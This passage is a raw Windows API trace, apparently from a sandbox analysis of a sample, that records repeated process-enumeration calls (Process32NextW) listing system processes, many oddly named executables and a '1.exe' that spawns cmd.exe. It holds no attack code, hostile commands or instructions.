Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0046.760] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0046.760] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0046.761] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0046.762] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0046.762] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0046.763] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0046.764] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0046.764] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0046.765] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0046.766] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0046.766] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0046.767] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0047.048] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0047.049] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0047.049] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0047.050] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0047.051] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0047.051] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0047.052] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0047.053] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0047.053] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0047.054] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0047.055] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0047.055] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0047.056] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0047.056] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0047.057] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0047.058] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0047.059] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0047.060] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0047.060] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0047.061] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0047.062] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0047.063] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0047.064] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0047.064] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0047.065] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0047.066] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0047.067] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0047.067] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0047.068] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0047.069] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0047.069] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.070] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0047.071] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0047.071] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0047.072] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0047.073] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0047.074] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0047.074] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0047.075] CloseHandle (hObject=0x2e4) returned 1 [0047.075] Sleep (dwMilliseconds=0x1f4) [0047.791] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x320 [0047.796] Process32FirstW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0047.797] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0047.801] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0047.801] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0047.802] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0047.803] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0047.803] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0047.804] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0047.804] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0047.805] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.806] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0047.806] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0047.807] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.808] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0047.808] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x55, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.809] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.810] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.811] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.811] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.812] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.813] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.813] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.814] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.815] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0047.815] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.816] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.816] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0047.817] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0047.818] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.818] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0047.819] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 